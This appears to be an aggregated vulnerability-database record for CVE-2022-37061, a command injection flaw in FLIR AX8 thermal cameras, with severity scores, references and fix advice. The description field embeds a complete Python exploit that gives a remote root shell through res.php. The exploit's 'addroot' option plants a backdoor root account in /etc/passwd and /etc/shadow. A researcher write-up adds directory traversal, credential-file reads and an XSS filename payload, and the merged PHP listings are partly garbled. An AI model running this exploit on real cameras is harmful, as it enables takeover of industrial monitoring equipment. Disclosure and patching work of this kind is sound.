ID

VAR-202208-1439


CVE

CVE-2022-37061


TITLE

FLIR Systems, Inc.  of  flir ax8  in the firmware  OS  Command injection vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2022-014925

DESCRIPTION

All FLIR AX8 thermal sensor cameras version up to and including 1.46.16 are vulnerable to Remote Command Injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. FLIR Systems, Inc. of flir ax8 The firmware has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. &lt;?php<br/> 2. if (isset($_POST["action"])) {<br/> 3. if(isset($_POST["resource"]))<br/> 6. {<br/> 7. if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) {<br/> 10. break;<br/> 12. }<br/> 13. break;<br/> 15. if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) {<br/> 17. break;<br/> 19. }<br/> 20. break;<br/> 22. default:<br/> 23. }<br/> 25. }<br/><br/> --------------------------------------------------------------------------------<br/> /FLIR/usr/www/palette.php:<br/> --------------------------<br/> 1. &lt;?php<br/> 2. if(isset($_POST["palette"])){<br/> 3. shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]);<br/> 4. }<br/> 6. ?&gt;<br/></code><br/> --------------------------------------------------------------------------------<br/><br/>Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l)lighttpd/1.4.33PHP/5.4.14. #!/usr/bin/env python # -*- coding: utf-8 -*- # # FLIR Systems FLIR AX8 Thermal Camera 1.32.16 Remote Root Exploit # # # Vendor: FLIR Systems, Inc. The AX8 helps # you guard against unplanned outages, service interruptions, and equipment # failure. # # The FLIR AX series camera/sensor also has built-in support to connect to # industrial control equipment such as programmable logic controllers (PLCs), # and allows the sharing of analysis and alarm results and simple control # using the Ethernet/IP and Modbus TCP field bus protocols. Compact and easy # to install, the AX8 provides continuous monitoring of electrical cabinets, # process and manufacturing areas, data centers, energy generation and distribution, # transportation and mass transit, storage facilities and refrigeration warehouses. The issues can be triggered when calling # multiple unsanitized HTTP GET/POST parameters within the shell_exec function # in res.php and palette.php file. # # ============================================================================= # /FLIR/usr/www/res.php: # ---------------------- # 1. <?php # 2. if (isset($_POST["action"])) { # 3. switch ($_POST["action"]) { # 4. case "get": # 5. if(isset($_POST["resource"])) # 6. switch ($_POST["resource"]) { # 8. case ".rtp.hflip": # 9. if (!file_exists("/FLIR/system/journal.d/horizontal_flip.cfg")) { # 10. $result = "false"; # 11. break; # 12. $result = file_get_contents("/FLIR/system/journal.d/horizontal_flip.cfg") === "1" ? "true" : "false"; # 14. break; # 15. case ".rtp.vflip": # 16. if (!file_exists("/FLIR/system/journal.d/vertical_flip.cfg")) { # 17. $result = "false"; # 18. break; # 19. $result = file_get_contents("/FLIR/system/journal.d/vertical_flip.cfg") === "1" ? "true" : "false"; # 21. break; # 22. default: # 23. $result = trim(shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/rls -o ".$_POST["resource"])); # 24. } # # ============================================================================= # /FLIR/usr/www/palette.php: # -------------------------- # 1. <?php # 2. if(isset($_POST["palette"])){ # 3. shell_exec("LD_LIBRARY_PATH=/FLIR/usr/lib /FLIR/usr/bin/palette ".$_POST["palette"]); # 4. echo json_encode(array("success")); # 5. ?> # # ============================================================================= # # # Tested on: GNU/Linux 3.0.35-flir+gfd883a0 (armv7l) # lighttpd/1.4.33 # PHP/5.4.14 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2018-5491 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5491.php # # # 26.07.2018 # import requests import colorama import random## import time#### import json#### import sys##### import os###### piton = os.path.basename(sys.argv[0]) if len(sys.argv) < 2: print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n' sys.exit() bannah = """ .---------------------------------. | 1984 Pictures | | | | presents | | ___ | | [| |=|{)__ | | |___| \/ ) | | /|\ /| | | / | \ | \\ | .---------------------------------. """ print bannah time.sleep(4) os.system('clear') print '\nFLIR AX8 Thermal Camera Remote Root Exploit' print 'By Zero Science Lab' ICU = ''' ```````` `./+ooosoooooo+/.` `.+ss+//:::::::://+ss+.` -oyo/::::-------:::::/oyo- `/yo+:::-------.------:::+oy/` `+yo+::---...........----:/+oy+` `/yo++/--...../+oo+:....---:/+oy/` `ss++//:-.../yhhhhhhy/...-://++ss` .ho++/::--.-yhhddddhhy-.--:://+oh. .ho+//::---/mmmmmmmmmm:---::/++oh. `ss++//::---+mNNNNNNm+---:://++ss` `/yo+//:::----+syys+-----://++oy/` `+yo++//:::-----------:://++oy+` `/yo++///:::::-:::::://+++oy/` .oyo+++////////////+++oyo. `.+ssoo++++++++++ooss+.` `./+osssssssso+/.` ```````` ''' colors = list(vars(colorama.Fore).values()) colored_chars = [random.choice(colors) + char for char in ICU] print(''.join(colored_chars)) print print '\x1b[1;37;44m'+'To freeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze on' print '\x1b[1;37;41m'+'To unfreeze the stream run: '+'\x1b[0m'+' /FLIR/usr/bin/freeze off\n' print '[*] Additional commands:' print ' [+] \'addroot\' for add root user.' print ' [+] \'exit\' for exit.\n' while True: zeTargets = 'http://'+sys.argv[1]+'/res.php' zeCommand = raw_input('\x1b[0;96;49m'+'root@neco-0J0X17:~# '+'\x1b[0m') zeHeaders = {'Cache-Control' : 'max-age=0', 'User-Agent' : 'thricer/251.4ev4h', 'Accept' : 'text/html,application/xhtml+xml', 'Accept-Encoding' : 'gzip, deflate', 'Accept-Language' : 'mk-MK,mk;q=1.7', 'Connection' : 'close', 'Connection-Type' : 'application/x-www-form-urlencoded'} zePardata = {'action' : 'get', 'resource' : ';'+zeCommand} try: zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata) print json.loads(zeRequest.text) if zeCommand.strip() == 'exit': sys.exit() if zeCommand.strip() == 'addroot': print '[+] Blind command injection using palette.php...' print '[+] Adding user \'roOt\' with password \'rewt\' in shadow file...' nuTargets = 'http://'+sys.argv[1]+'/palette.php' nuHeaders = zeHeaders nuHexstrn = ('\\x72\\x6f\\x4f\\x74\\x3a\\x24\\x31' '\\x24\\x4d\\x4a\\x4f\\x6e\\x56\\x2f' '\\x59\\x33\\x24\\x74\\x44\\x6e\\x4d' '\\x49\\x42\\x4d\\x79\\x30\\x6c\\x45' '\\x51\\x32\\x6b\\x44\\x70\\x66\\x67' '\\x54\\x4a\\x50\\x30\\x3a\\x31\\x36' '\\x39\\x31\\x34\\x3a\\x30\\x3a\\x39' '\\x39\\x39\\x39\\x39\\x3a\\x37\\x3a' '\\x3a\\x3a\\x0a\\x0d') nuPadata1 = {'palette' : '1;echo \"roOt:x:0:0:pwn:/sys:/bin/bash\" >> /etc/passwd'} nuPadata2 = {'palette' : '1;echo -n -e \"'+nuHexstrn+'\" >> /etc/shadow'} requests.post(nuTargets, headers=nuHeaders, data=nuPadata1) time.sleep(2) requests.post(nuTargets, headers=nuHeaders, data=nuPadata2) print '[*] Success!\n' else: pass except Exception: print '[*] Error!' break sys.exit() . # FLIR AX8 vulnerabilities. ### Product description: The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment. * [CVE-2022-37060] - Unauthenticated Directory Traversal. FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path. * [CVE-2022-37062] - Improper Access Control. FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it. * [CVE-2022-37063] - Reflected cross-site scripting. FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. ### Step by Step Example (How to Reproduce and verify) the vulnerabilities: 1. The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file. The server returns a JSON response containing the contents of the `/etc/shadow` file. 2. Unauthenticated Directory Traversal. The endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file. The error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight. 3. Improper Access Control. The endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database. 4. Reflected cross-site scripting. In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call <img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run ### Recommendations for how to fix the 4 vulnerabilities: * Vulnerability 1: The variable `$_POST["id"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. More info: https://www.php.net/intval https://www.php.net/manual/en/function.escapeshellcmd https://www.php.net/manual/en/function.escapeshellarg * Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions. More info: https://www.php.net/manual/en/function.pathinfo * Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`. More info: https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html * Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters. More info: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html ### Reference: https://www.flir.com/products/ax8-automation/ ### Security researchers: * [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen) * [Samy Younsi] (https://www.linkedin.com/in/samy-younsi)

Trust: 1.89

sources: NVD: CVE-2022-37061 // JVNDB: JVNDB-2022-014925 // ZSL: ZSL-2018-5491 // PACKETSTORM: 149789 // PACKETSTORM: 168116

AFFECTED PRODUCTS

vendor:flirmodel:ax8scope:lteversion:1.46.16

Trust: 1.0

vendor:flirmodel:ax8scope:eqversion: -

Trust: 0.8

vendor:flirmodel:ax8scope: - version: -

Trust: 0.8

vendor:flirmodel:ax8scope:lteversion:flir ax8 firmware 1.46.16 and earlier

Trust: 0.8

vendor:flirmodel:systems flir ax8 thermal camerascope:eqversion:1.17.13

Trust: 0.1

vendor:flirmodel:systems flir ax8 thermal camerascope:eqversion:os: neco_v1.8-0-g7ffe5b3

Trust: 0.1

vendor:flirmodel:systems flir ax8 thermal camerascope:eqversion:hardware: flir systems neco board

Trust: 0.1

sources: ZSL: ZSL-2018-5491 // JVNDB: JVNDB-2022-014925 // NVD: CVE-2022-37061

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2022-37061
value: CRITICAL

Trust: 1.0

NVD: CVE-2022-37061
value: CRITICAL

Trust: 0.8

CNNVD: CNNVD-202208-3378
value: CRITICAL

Trust: 0.6

ZSL: ZSL-2018-5491
value: (5/5)

Trust: 0.1

nvd@nist.gov: CVE-2022-37061
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.1

Trust: 1.0

NVD: CVE-2022-37061
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: ZSL: ZSL-2018-5491 // JVNDB: JVNDB-2022-014925 // CNNVD: CNNVD-202208-3378 // NVD: CVE-2022-37061

PROBLEMTYPE DATA

problemtype:CWE-78

Trust: 1.0

problemtype:OS Command injection (CWE-78) [NVD evaluation ]

Trust: 0.8

sources: JVNDB: JVNDB-2022-014925 // NVD: CVE-2022-37061

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 149789 // CNNVD: CNNVD-202208-3378

TYPE

operating system commend injection

Trust: 0.6

sources: CNNVD: CNNVD-202208-3378

EXPLOIT AVAILABILITY

sources: ZSL: ZSL-2018-5491

EXTERNAL IDS

db:NVDid:CVE-2022-37061

Trust: 3.3

db:ZSLid:ZSL-2018-5491

Trust: 2.6

db:PACKETSTORMid:168116

Trust: 2.5

db:PACKETSTORMid:169701

Trust: 2.4

db:PACKETSTORMid:168114

Trust: 2.4

db:JVNDBid:JVNDB-2022-014925

Trust: 0.8

db:CXSECURITYid:WLB-2022080059

Trust: 0.6

db:CNNVDid:CNNVD-202208-3378

Trust: 0.6

db:PACKETSTORMid:149789

Trust: 0.2

db:EXPLOIT-DBid:45602

Trust: 0.1

sources: ZSL: ZSL-2018-5491 // JVNDB: JVNDB-2022-014925 // PACKETSTORM: 149789 // PACKETSTORM: 168116 // CNNVD: CNNVD-202208-3378 // NVD: CVE-2022-37061

REFERENCES

url:http://packetstormsecurity.com/files/168116/flir-ax8-1.46.16-traversal-access-control-command-injection-xss.html

Trust: 3.0

url:http://packetstormsecurity.com/files/169701/flir-ax8-1.46.16-remote-command-injection.html

Trust: 3.0

url:https://www.flir.com/products/ax8-automation/

Trust: 2.5

url:https://www.zeroscience.mk/en/vulnerabilities/zsl-2018-5491.php

Trust: 2.5

url:http://packetstormsecurity.com/files/168114/flix-ax8-1.46.16-remote-command-execution.html

Trust: 2.4

url:https://gist.github.com/nwqda/9e16852ab7827dc62b8e44d6180a6899

Trust: 2.4

url:https://nvd.nist.gov/vuln/detail/cve-2022-37061

Trust: 0.9

url:https://cxsecurity.com/cveshow/cve-2022-37061/

Trust: 0.6

url:https://cxsecurity.com/issue/wlb-2022080059

Trust: 0.6

url:https://www.flir.com/security/best-practices-for-cybersecurity/

Trust: 0.1

url:https://www.flir.com/globalassets/security/flir-pro-security-cyber-hardening-guide.pdf

Trust: 0.1

url:https://www.flir.com/globalassets/security/cybersecurity-bulletin-10-12-18.pdf

Trust: 0.1

url:https://www.exploit-db.com/exploits/45602/

Trust: 0.1

url:https://packetstormsecurity.com/files/149789

Trust: 0.1

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/151286

Trust: 0.1

url:http://vfocus.net/art/20181016/14873.html

Trust: 0.1

url:https://fortiguard.com/encyclopedia/ips/47031

Trust: 0.1

url:http://'+sys.argv[1]+'/res.php'

Trust: 0.1

url:http://'+sys.argv[1]+'/palette.php'

Trust: 0.1

url:https://www.flir.com

Trust: 0.1

url:https://cheatsheetseries.owasp.org/cheatsheets/cross_site_scripting_prevention_cheat_sheet.html

Trust: 0.1

url:https://www.php.net/intval

Trust: 0.1

url:https://www.linkedin.com/in/thomasjknudsen)

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-37062

Trust: 0.1

url:https://www.php.net/manual/en/function.pathinfo

Trust: 0.1

url:https://www.php.net/manual/en/function.escapeshellcmd

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-37060

Trust: 0.1

url:https://www.linkedin.com/in/samy-younsi)

Trust: 0.1

url:https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html

Trust: 0.1

url:https://www.php.net/manual/en/function.escapeshellarg

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-37063

Trust: 0.1

sources: ZSL: ZSL-2018-5491 // JVNDB: JVNDB-2022-014925 // PACKETSTORM: 149789 // PACKETSTORM: 168116 // CNNVD: CNNVD-202208-3378 // NVD: CVE-2022-37061

CREDITS

Samy Younsi

Trust: 0.6

sources: CNNVD: CNNVD-202208-3378

SOURCES

db:ZSLid:ZSL-2018-5491
db:JVNDBid:JVNDB-2022-014925
db:PACKETSTORMid:149789
db:PACKETSTORMid:168116
db:CNNVDid:CNNVD-202208-3378
db:NVDid:CVE-2022-37061

LAST UPDATE DATE

2024-08-14T14:24:37.282000+00:00


SOURCES UPDATE DATE

db:ZSLid:ZSL-2018-5491date:2018-11-20T00:00:00
db:JVNDBid:JVNDB-2022-014925date:2023-09-22T08:25:00
db:CNNVDid:CNNVD-202208-3378date:2022-11-08T00:00:00
db:NVDid:CVE-2022-37061date:2022-12-09T15:32:37.407

SOURCES RELEASE DATE

db:ZSLid:ZSL-2018-5491date:2018-10-14T00:00:00
db:JVNDBid:JVNDB-2022-014925date:2023-09-22T00:00:00
db:PACKETSTORMid:149789date:2018-10-15T16:42:47
db:PACKETSTORMid:168116date:2022-08-19T19:24:22
db:CNNVDid:CNNVD-202208-3378date:2022-08-18T00:00:00
db:NVDid:CVE-2022-37061date:2022-08-18T18:15:08.317